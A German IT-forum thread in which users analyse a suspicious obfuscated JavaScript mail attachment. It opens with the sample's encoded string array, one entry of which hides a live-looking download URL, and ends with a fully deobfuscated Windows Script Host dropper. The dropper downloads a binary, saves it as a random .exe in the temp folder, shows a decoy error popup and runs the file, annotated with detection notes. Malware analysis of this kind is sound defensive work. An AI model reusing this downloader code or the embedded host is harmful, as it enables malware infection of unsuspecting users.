'\x55\x47\x39\x7a\x61\x58\x52\x70\x62\x32\x34\x3d', '\x55\x32\x46\x32\x5a\x56\x52\x76\x52\x6d\x6c\x73\x5a\x51\x3d\x3d', '\x56\x48\x6c\x77\x5a\x51\x3d\x3d', '\x51\x32\x78\x76\x63\x32\x55\x3d', '\x57\x6b\x39\x73\x56\x45\x34\x3d', '\x57\x57\x35\x53\x5a\x48\x51\x3d', '\x53\x6c\x68\x51\x57\x6d\x51\x3d', '\x63\x55\x46\x31\x52\x32\x38\x3d', '\x59\x55\x39\x4b\x5a\x56\x59\x3d', '\x59\x57\x78\x33\x52\x6b\x55\x3d', '\x62\x6c\x56\x36\x61\x31\x4d\x3d', '\x54\x56\x46\x6d\x59\x56\x6b\x3d', '\x55\x58\x68\x48\x53\x31\x6b\x3d', '\x56\x33\x64\x73\x54\x48\x41\x3d', '\x65\x47\x74\x47\x57\x57\x30\x3d', '\x62\x31\x56\x33\x57\x6b\x51\x3d', '\x56\x32\x5a\x6f\x53\x6e\x49\x3d', '\x57\x6c\x6c\x46\x55\x56\x49\x3d', '\x5a\x32\x56\x4d\x63\x33\x4d\x3d', '\x61\x46\x56\x4f\x61\x32\x6b\x3d', 
'\x5a\x55\x6c\x46\x65\x6b\x59\x3d', '\x5a\x6c\x70\x32\x56\x32\x6b\x3d', '\x64\x45\x31\x5a\x55\x47\x4d\x3d', '\x56\x57\x35\x76\x59\x56\x49\x3d', '\x59\x6b\x56\x6e\x52\x30\x34\x3d', '\x63\x33\x68\x6c\x61\x47\x63\x3d', '\x64\x56\x42\x75\x55\x47\x59\x3d', '\x51\x55\x64\x33\x5a\x57\x67\x3d', '\x64\x55\x5a\x71\x61\x32\x67\x3d', '\x51\x6b\x4a\x72\x63\x6b\x38\x3d', '\x54\x32\x68\x43\x64\x56\x6b\x3d', '\x51\x57\x35\x50\x63\x30\x34\x3d', '\x59\x6c\x46\x6b\x52\x56\x6b\x3d', '\x55\x31\x46\x48\x64\x47\x63\x3d', '\x54\x6c\x6c\x75\x62\x6d\x6b\x3d', '\x54\x6d\x31\x76\x51\x57\x6f\x3d', '\x56\x46\x70\x78\x61\x45\x77\x3d', '\x53\x6c\x4a\x7a\x63\x56\x63\x3d', '\x51\x6b\x74\x47\x52\x45\x6f\x3d', '\x65\x6e\x46\x47\x54\x47\x67\x3d', '\x5a\x32\x56\x69\x59\x32\x6b\x3d', '\x51\x30\x78\x79\x53\x55\x55\x3d', '\x51\x6d\x4a\x58\x5a\x30\x34\x3d', '\x5a\x33\x6c\x71\x63\x48\x67\x3d', '\x62\x6d\x39\x4d\x62\x32\x38\x3d', '\x61\x32\x6c\x32\x61\x45\x45\x3d', '\x62\x56\x46\x79\x52\x48\x41\x3d', '\x63\x6b\x4a\x69\x53\x47\x77\x3d', '\x56\x6d\x35\x70\x53\x30\x59\x3d', '\x55\x57\x64\x49\x55\x57\x30\x3d', '\x64\x45\x5a\x73\x55\x45\x51\x3d', '\x54\x47\x5a\x42\x63\x6e\x6b\x3d', '\x51\x55\x52\x6b\x52\x6e\x49\x3d', '\x61\x6e\x5a\x77\x59\x58\x51\x3d', '\x57\x47\x39\x4b\x54\x55\x6b\x3d', '\x63\x57\x39\x55\x55\x32\x77\x3d', '\x59\x58\x64\x50\x64\x48\x6b\x3d', '\x56\x47\x70\x32\x55\x6e\x51\x3d', '\x53\x58\x5a\x34\x64\x31\x6b\x3d', '\x5a\x57\x46\x75\x52\x48\x6f\x3d', '\x5a\x47\x31\x55\x62\x6b\x6f\x3d', '\x63\x6d\x46\x75\x5a\x47\x39\x74', '\x64\x47\x39\x54\x64\x48\x4a\x70\x62\x6d\x63\x3d', '\x63\x33\x56\x69\x63\x33\x52\x79', '\x52\x32\x56\x30\x55\x33\x42\x6c\x59\x32\x6c\x68\x62\x45\x5a\x76\x62\x47\x52\x6c\x63\x67\x3d\x3d', '\x52\x6d\x70\x46\x54\x56\x67\x3d', '\x63\x48\x4e\x7a\x55\x47\x4d\x3d', '\x56\x32\x31\x50\x62\x6d\x77\x3d', '\x59\x55\x5a\x32\x64\x6e\x41\x3d', '\x5a\x32\x74\x70\x54\x30\x30\x3d', '\x63\x57\x78\x6d\x52\x56\x45\x3d', '\x56\x47\x31\x79\x53\x55\x55\x3d', '\x65\x6e\x4e\x54\x5a\x47\x30\x3d', 
'\x53\x48\x4e\x6c\x55\x30\x55\x3d', '\x57\x6e\x4a\x4c\x61\x6e\x51\x3d', '\x59\x6c\x46\x55\x61\x56\x55\x3d', '\x65\x6c\x6c\x78\x5a\x57\x77\x3d', '\x5a\x31\x56\x46\x64\x45\x30\x3d', '\x64\x46\x68\x76\x52\x56\x55\x3d', '\x52\x58\x4a\x43\x57\x6b\x6b\x3d', '\x52\x56\x42\x59\x62\x6d\x34\x3d', '\x54\x6b\x46\x30\x65\x48\x41\x3d', '\x59\x33\x42\x7a\x63\x46\x67\x3d', '\x63\x58\x70\x49\x64\x48\x41\x3d', '\x62\x6b\x74\x56\x54\x48\x49\x3d', '\x52\x6c\x68\x4b\x64\x6e\x59\x3d', '\x5a\x55\x52\x71\x62\x47\x4d\x3d', '\x52\x55\x5a\x71\x61\x56\x6f\x3d', '\x53\x30\x78\x5a\x62\x55\x45\x3d', '\x63\x6b\x6c\x44\x53\x47\x55\x3d', '\x63\x58\x68\x71\x63\x56\x55\x3d', '\x64\x31\x4a\x6b\x51\x57\x30\x3d', '\x65\x47\x78\x79\x63\x55\x51\x3d', '\x53\x6b\x52\x30\x57\x6c\x41\x3d', '\x64\x6e\x64\x5a\x61\x56\x67\x3d', '\x64\x6b\x35\x5a\x56\x30\x34\x3d', '\x53\x47\x5a\x59\x57\x6c\x67\x3d', '\x5a\x48\x5a\x48\x65\x45\x59\x3d', '\x56\x56\x52\x72\x57\x6c\x6b\x3d', '\x53\x30\x74\x54\x59\x6b\x51\x3d', '\x65\x55\x74\x6a\x55\x45\x55\x3d', '\x63\x56\x68\x32\x5a\x47\x73\x3d', '\x54\x57\x46\x44\x61\x31\x63\x3d', '\x4e\x33\x77\x7a\x66\x44\x46\x38\x4e\x48\x77\x31\x66\x44\x42\x38\x4e\x6e\x77\x79', '\x64\x33\x4e\x48\x63\x6d\x63\x3d', '\x51\x32\x64\x56\x63\x32\x4d\x3d', '\x64\x46\x6c\x36\x63\x45\x4d\x3d', '\x62\x30\x5a\x70\x54\x32\x51\x3d', '\x4d\x48\x77\x7a\x66\x44\x46\x38\x4e\x58\x77\x79\x66\x44\x51\x3d', '\x55\x46\x4a\x76\x62\x30\x63\x3d', '\x64\x6e\x42\x55\x52\x45\x49\x3d', 
'\x56\x47\x68\x6c\x63\x6d\x55\x67\x64\x32\x46\x7a\x49\x47\x46\x75\x49\x47\x56\x79\x63\x6d\x39\x79\x49\x47\x39\x77\x5a\x57\x35\x70\x62\x6d\x63\x67\x64\x47\x68\x70\x63\x79\x42\x6b\x62\x32\x4e\x31\x62\x57\x56\x75\x64\x43\x34\x67\x56\x47\x68\x6c\x49\x47\x5a\x70\x62\x47\x55\x67\x61\x58\x4d\x67\x5a\x47\x46\x74\x59\x57\x64\x6c\x5a\x43\x42\x68\x62\x6d\x51\x67\x59\x32\x39\x31\x62\x47\x51\x67\x62\x6d\x39\x30\x49\x47\x4a\x6c\x49\x48\x4a\x6c\x63\x47\x46\x70\x63\x6d\x56\x6b\x49\x43\x68\x6d\x62\x33\x49\x67\x5a\x58\x68\x68\x62\x58\x42\x73\x5a\x53\x77\x67\x61\x58\x51\x67\x64\x32\x46\x7a\x49\x48\x4e\x6c\x62\x6e\x51\x67\x59\x58\x4d\x67\x59\x57\x34\x67\x5a\x57\x31\x68\x61\x57\x77\x67\x59\x58\x52\x30\x59\x57\x4e\x6f\x62\x57\x56\x75\x64\x43\x42\x68\x62\x6d\x51\x67\x64\x32\x46\x7a\x62\x69\x64\x30\x49\x47\x4e\x76\x63\x6e\x4a\x6c\x59\x33\x52\x73\x65\x53\x42\x6b\x5a\x57\x4e\x76\x5a\x47\x56\x6b\x4b\x53\x34\x3d', '\x63\x30\x70\x72\x53\x31\x4d\x3d', '\x57\x47\x35\x4b\x55\x33\x6b\x3d', '\x51\x6e\x56\x31\x63\x58\x55\x3d', '\x54\x6d\x39\x30\x49\x46\x4e\x31\x63\x48\x42\x76\x63\x6e\x52\x6c\x5a\x43\x42\x47\x61\x57\x78\x6c\x49\x45\x5a\x76\x63\x6d\x31\x68\x64\x41\x3d\x3d', '\x51\x6e\x70\x48\x54\x31\x45\x3d', '\x55\x47\x39\x77\x64\x58\x41\x3d', '\x51\x33\x4a\x6c\x59\x58\x52\x6c\x54\x32\x4a\x71\x5a\x57\x4e\x30', '\x53\x45\x52\x46\x56\x32\x73\x3d', '\x53\x6d\x56\x72\x5a\x58\x6f\x3d', '\x56\x31\x4e\x6a\x63\x6d\x6c\x77\x64\x43\x35\x54\x61\x47\x56\x73\x62\x41\x3d\x3d', '\x64\x30\x56\x58\x55\x6b\x67\x3d', '\x52\x6c\x4a\x75\x62\x6d\x30\x3d', '\x64\x47\x64\x4b\x52\x32\x55\x3d', '\x62\x57\x4e\x77\x51\x6b\x49\x3d', '\x55\x45\x68\x46\x53\x6d\x77\x3d', '\x54\x56\x4e\x59\x54\x55\x77\x79\x4c\x6c\x68\x4e\x54\x45\x68\x55\x56\x46\x41\x3d', '\x53\x33\x70\x5a\x52\x55\x55\x3d', '\x52\x30\x56\x55', '\x65\x48\x4e\x36\x64\x58\x49\x3d', '\x61\x45\x4a\x6e\x5a\x57\x59\x3d', '\x65\x6e\x52\x44\x56\x31\x4d\x3d', '\x51\x58\x52\x68\x63\x56\x59\x3d', '\x57\x55\x5a\x6f\x65\x55\x77\x3d', '\x52\x45\x64\x55\x51\x6c\x67\x3d', 
'\x64\x47\x56\x54\x63\x6b\x49\x3d', '\x56\x6d\x6c\x4e\x57\x46\x63\x3d', '\x57\x6e\x5a\x4c\x52\x58\x67\x3d', '\x54\x6b\x64\x33\x65\x48\x63\x3d', '\x52\x57\x39\x55\x5a\x46\x6f\x3d', '\x5a\x55\x68\x30\x57\x6c\x6b\x3d', '\x62\x33\x42\x6c\x62\x67\x3d\x3d', '\x63\x32\x56\x75\x5a\x41\x3d\x3d', '\x63\x33\x52\x68\x64\x48\x56\x7a', '\x55\x6d\x56\x7a\x63\x47\x39\x75\x63\x32\x56\x43\x62\x32\x52\x35', '\x55\x6e\x56\x75', '\x59\x30\x78\x75\x64\x48\x4d\x3d', '\x56\x58\x42\x58\x57\x58\x6b\x3d', '\x54\x46\x5a\x79\x63\x48\x41\x3d', '\x56\x33\x42\x6c\x62\x6b\x77\x3d', '\x55\x32\x4e\x79\x61\x58\x42\x30\x61\x57\x35\x6e\x4c\x6b\x5a\x70\x62\x47\x56\x54\x65\x58\x4e\x30\x5a\x57\x31\x50\x59\x6d\x70\x6c\x59\x33\x51\x3d', '\x53\x57\x52\x70\x53\x30\x51\x3d', '\x59\x6b\x52\x61\x55\x47\x6b\x3d', '\x61\x33\x4e\x75\x56\x6b\x4d\x3d', '\x4c\x6d\x56\x34\x5a\x51\x3d\x3d', '\x62\x47\x56\x4b\x53\x33\x6f\x3d', '\x4e\x6e\x77\x7a\x66\x44\x46\x38\x4d\x6e\x77\x31\x66\x44\x42\x38\x4e\x48\x77\x33', '\x54\x31\x64\x79\x52\x32\x38\x3d', '\x51\x55\x52\x50\x52\x45\x49\x75\x55\x33\x52\x79\x5a\x57\x46\x74', '\x64\x45\x4e\x74\x59\x57\x55\x3d', '\x62\x6b\x68\x46\x64\x45\x38\x3d', '\x64\x6d\x70\x73\x54\x56\x51\x3d', '\x5a\x57\x70\x33\x53\x6c\x45\x3d', '\x64\x30\x4a\x4d\x52\x47\x34\x3d', '\x63\x6b\x70\x72\x5a\x45\x38\x3d', '\x53\x57\x31\x49\x61\x46\x67\x3d', '\x57\x55\x64\x72\x52\x46\x49\x3d', '\x52\x6e\x46\x49\x62\x58\x55\x3d', '\x55\x30\x4a\x57\x55\x32\x59\x3d', '\x65\x6b\x5a\x68\x54\x55\x55\x3d', '\x54\x56\x52\x44\x62\x58\x59\x3d', '\x62\x48\x68\x61\x52\x58\x45\x3d', '\x61\x48\x52\x74\x64\x47\x34\x3d', '\x64\x6c\x42\x75\x53\x47\x30\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x31\x6c\x61\x57\x74\x7a\x4c\x6d\x52\x72\x4c\x31\x5a\x45\x59\x6c\x51\x74\x62\x6c\x6c\x66\x61\x56\x70\x34\x63\x55\x34\x74\x5a\x6b\x46\x34\x4c\x32\x64\x68\x58\x7a\x67\x76', '\x52\x45\x74\x77\x56\x6e\x4d\x3d', '\x62\x47\x68\x6f\x61\x6b\x63\x3d', '\x64\x6c\x70\x70\x65\x48\x45\x3d', '\x64\x48\x64\x31\x55\x57\x51\x3d', 
'\x62\x57\x39\x6d\x5a\x6d\x63\x3d', '\x54\x56\x68\x74\x52\x46\x63\x3d', '\x5a\x31\x64\x4c\x52\x30\x6b\x3d', '\x54\x55\x68\x51\x65\x6e\x6b\x3d', '\x64\x32\x52\x6f\x61\x47\x45\x3d', '\x63\x48\x56\x75\x63\x47\x51\x3d', '\x59\x57\x31\x46\x63\x46\x51\x3d', '\x51\x33\x42\x5a\x51\x32\x77\x3d', '\x53\x6d\x70\x30\x63\x55\x45\x3d', '\x5a\x58\x64\x44\x54\x58\x51\x3d', '\x53\x6b\x5a\x6e\x5a\x33\x51\x3d', '\x54\x57\x46\x50\x59\x6c\x63\x3d', '\x64\x45\x4e\x36\x52\x6e\x6b\x3d'];
Sieht mir verdächtig nach einer Notation eines Programms aus.
Also übersetzt: Ich würde vermuten, dass dieses Script mittels ActiveX eine Datei anlegt, dort Binärcode reinschiebt und eben diesen Mist ausführt. Außerdem tippe ich darauf, dass Zeug aus dem Netz nachgeladen wird. Und damit das nicht ganz so leicht auffällt, werden die entscheidenden Schritte verschlüsselt.

Frage, was habt Ihr denn für ein System? Ich war immer der Meinung, dass ActiveX schon seit hundert Jahren nicht mehr unterstützt wird.
Das lief früher mal unter dem alten Internetexplorer.
Da konnte man lustige Dinge machen.
Ich hab mal etwas programmiert, das von einer Webseite heraus den Windowsdesktop durch eine von mir programmierte Alternative ersetzt.

LG
 
#3
Danke erstmal für die superschnelle Antwort!

Es laufen teilweise noch sehr alte Systeme. Einige Maschinen haben in ihrer integrierten Steuerungskonsole im Grunde XP laufen.
Da wäre eben die Frage, ob sich dieses Ding über unser Netz selbstständig verbreiten kann bzw. ob es überhaupt aktiv wurde, da es auf einem Mitarbeiterrechner auf dem neuesten Stand ausgeführt wurde.
Naja wird eine interessante Woche.

LG
 

asc

#4
Das Script sendet Informationen an bestimmte Sites und holt sich entsprechend für die jeweilige Plattform passende Malware.
Nimm den Rechner am besten vom Netz und lass mal Malware Bytes drüberlaufen (ist eigl. immer ganz aktuell).

Hab den Code nur grob überflogen, da die Verschleierung ziemlich nervig ist.
Bei Interesse könnte ich das auch komplett auseinander nehmen (ist ziemlich simpel), ist aber vermutlich nicht notwendig.

Der Schadcode funktioniert im Übrigen nur in Internet Explorer und nur, wenn der Betroffene die Sicherheitswarnungen ("Ausführen von ActiveX-Steuerelementen") bestätigt hat, es sei denn, es wurde per Domänenrichtlinie irgendwas verpfuscht oder der Benutzer hat es selbst dauerhaft aktiviert...

Es laufen teilweise noch sehr alte Systeme. Einige Maschinen haben in ihrer integrierten Steuerungskonsole im Grunde XP laufen.
Ich kenne die Situation, dass Firmen wegen veralteter Software auf XP/7 festgenagelt werden (vor allem in der Industrie). Aber bitte hängt diese Kisten nicht ins Internet oder versucht zumindest diesen Mist zu virtualisieren wenn es geht :(
 
#5
Herzlichen Dank!
Wir haben den Rechner sofort vom Netz genommen und diverse Scanner drüberlaufen lassen. Da wurde nichts gefunden, aber da wir keine Ahnung hatten, worum es sich dabei handelt, hätte es sein können, dass es sich entweder schon verbreitet hat oder gar nicht entdeckt wird.

Der Hinweis, dass es nur im IE funktioniert und mit dem Bestätigen der Sicherheitswarnung, ist super. Jetzt sollten wir rausfinden können, ob es tatsächlich ausgeführt wurde.

Die laufen in einem eigenen VLAN, das ist aber auch schon alles. Da hängt ein unglaublicher Rattenschwanz dran.

Danke asc und beepsoft für die Hilfe!
 

Jan Krüger

#6
Habe auch mal eine kleine Analyse gemacht.

Der Code enthält fünf verschleierte Links auf folgende Malware, davon sind drei Stand jetzt noch funktionsfähig:
https://www.virustotal.com/gui/file/2ed3333ed22827d595649d0751bf63c537c9d30f2fee49b826a91db2db4aa876

Hier der entschleierte Code - einige Teile des Codes konnten niemals ausgeführt werden, die habe ich entfernt. Ich darf vielleicht noch anmerken, dass der Code etwas stümperhaft geschrieben und auch etwas stümperhaft verschleiert wurde - das alles wieder zurückzuspulen war geradezu trivial, wenn auch eine gewisse Menge Fleißarbeit...

Javascript:
/**
 * Synchronous HTTP GET over the MSXML2.XMLHTTP COM object (stage-1 downloader).
 *
 * @param {string} url - address to fetch (one of the five censored URLs)
 * @param {function(*, boolean)} callback - receives (responseBody, false) on
 *   HTTP 200, otherwise (null, true). Because the callback is invoked inside
 *   the try block, an exception thrown by the callback itself lands in the
 *   catch and triggers a second callback(null, true).
 *
 * NOTE(review): as pasted, the listing has one `}` too many after the catch
 * block and does not parse verbatim; presumably a transcription artefact of
 * the deobfuscation, the intended structure is clear.
 *
 * Detection note: a script host (wscript.exe/cscript.exe) instantiating
 * MSXML2.XMLHTTP and shortly afterwards ADODB.Stream (see WriteToTempFile)
 * is the characteristic download-and-drop sequence; log COM ProgID creation
 * from script hosts and the outbound request to these URLs.
 */
function get_url(url, callback) {
    try {
        var P = new ActiveXObject('MSXML2.XMLHTTP');
        P.open('GET', url, false); // async = false: blocks until the response arrives
        P.send();
        if (P.status == 200) {
            return callback(P.responseBody, false); // raw bytes of the downloaded file
        } else {
            return callback(null, true);
        }
    } catch (V) {
            return callback(null, true);
        }
    }
}

/**
 * Fetches the second-stage binary, trying five hard-coded URLs in turn
 * (nested callbacks: URL 2 is only tried if URL 1 fails, and so on).
 *
 * @param {function(*, boolean)} callback - receives (response, false) with the
 *   first body obtained, or (null, true) once all five URLs have failed or an
 *   exception escaped.
 *
 * NOTE(review): the URL-1 success branch is inconsistent with the other four.
 * It writes `data` to a temp file, but no `data` exists in this scope (the
 * fetched body is `response`), and it would hand the file *name* rather than
 * the body to the callback. Presumably a leftover of the obfuscated original;
 * as written, n.Write(data) throws a ReferenceError, get_url's catch turns
 * that into callback(null, true), and the chain falls through to URL 2.
 * `bd` in the URL-2 branch is unused.
 */
function get_payload(callback) {
    try {
        get_url('http://url-1-zensiert.invalid/', function(response, error) {
            if (!error) {
                var m = GetTempFileName();
                if (m) {
                    // Same ADODB.Stream write as WriteToTempFile, duplicated inline.
                    var n = new ActiveXObject('ADODB.Stream');
                    n.Open();
                    n.Type = 0x1; // adTypeBinary
                    n.Write(data); // `data` is not defined here — see note above
                    n.Position = 0x0;
                    n.SaveToFile(m, 0x2); // adSaveCreateOverWrite
                    n.Close();
                    return callback(m, false);
                } else {
                    return callback(null, true);
                }
            } else {
                get_url('http://url-2-zensiert.invalid/', function(response, error) {
                    var bd = {}; // unused
                    if (!error) {
                        return callback(response, false);
                    } else {
                        get_url('http://url-3-zensiert.invalid/', function(response, error) {
                            if (!error) {
                                return callback(response, false);
                            } else {
                                get_url('http://url-4-zensiert.invalid/', function(response, error) {
                                    if (!error) {
                                        return callback(response, false);
                                    } else {
                                        get_url('http://url-5-zensiert.invalid/', function(response, error) {
                                            if (!error) {
                                                return callback(response, false);
                                            } else {
                                                return callback(null, true); // all five URLs failed
                                            }
                                        });
                                    }
                                });
                            }
                        });
                    }
                });
            }
        });
    } catch (d6) {
        return callback(null, true);
    }
}

/**
 * Builds the drop path for the downloaded binary:
 * <TemporaryFolder>\<9 random base-36 characters>.exe
 *
 * GetSpecialFolder(2) is the FileSystemObject TemporaryFolder constant;
 * Math.random().toString(36).substr(2, 9) yields the random name.
 *
 * @returns {string|false} the path, or false if the FileSystemObject could
 *   not be created (e.g. COM access blocked).
 *
 * Detection note: a freshly created, randomly named .exe in %TEMP% written by
 * wscript.exe/cscript.exe and executed seconds later is the observable
 * artefact of this sample; forensic timelines of the user's temp folder
 * should show it even if the binary itself has since been removed.
 */
function GetTempFileName() {
    try {
        var fso = new ActiveXObject('Scripting.FileSystemObject');
        return fso.GetSpecialFolder(0x2) + '\\' + Math.random().toString(0x24).substr(0x2, 0x9) + '.exe';
    } catch (dn) {
        return false;
    }
}

/**
 * Writes the downloaded bytes to a new .exe in the temp folder via ADODB.Stream.
 *
 * @param {*} data - binary response body from get_url (written as a binary
 *   stream: Type 1 = adTypeBinary; SaveToFile mode 2 = adSaveCreateOverWrite)
 * @param {function(string|null, boolean)} callback - receives (path, false) on
 *   success, (null, true) if no temp name could be built or the write threw.
 *
 * Mitigation note: ADODB.Stream writing to disk from a script host is rarely
 * legitimate on workstations; blocking wscript.exe for mail attachments
 * (file-association change or application allow-listing) stops this stage
 * before any file is written.
 */
function WriteToTempFile(data, callback) {
    try {
        var name = GetTempFileName();
        if (name) {
            var file = new ActiveXObject('ADODB.Stream');
            file.Open();
            file.Type = 0x1; // adTypeBinary
            file.Write(data);
            file.Position = 0x0;
            file.SaveToFile(name, 0x2); // adSaveCreateOverWrite
            file.Close();
            return callback(name, false);
        } else {
            return callback(null, true);
        }
    } catch (dH) {
        return callback(null, true);
    }
}

// Entry point: download the payload, show a decoy "damaged document" dialog,
// then drop and run the binary.
//
// NOTE(review): `WScript.CreateObject` exists only under Windows Script Host
// (wscript.exe / cscript.exe), so this sample runs when the .js attachment is
// opened from the mail client or Explorer, not inside a browser; under WSH
// `new ActiveXObject(...)` creates COM objects without the browser's ActiveX
// prompt. Whether it ran on a given machine is therefore best answered from
// the script host's process history and the temp-folder artefact described
// at GetTempFileName, not from browser settings.
get_payload(function(data, error) {
    var WshShell = WScript.CreateObject('WScript.Shell');
    var Text = 'There was an error opening this document. The file is damaged and could not be repaired (for example, it was sent as an email attachment and wasn\'t correctly decoded).';
    var Title = 'Not Supported File Format';
    // Decoy: shown regardless of whether the download succeeded. Popup args:
    // 0 = no auto-close timeout, 0x40 = information icon.
    var Res = WshShell.Popup(Text, 0x0, Title, 0x40);
    if (!error) {
        WriteToTempFile(data, function(filename, error) { // inner `error` shadows the outer one
            if (!error) {
                try {
                    var shell = new ActiveXObject('WScript.Shell');
                    shell.Run(filename); // executes the dropped .exe; failures are swallowed
                } catch (dW) {}
            }
        });
    }
});
 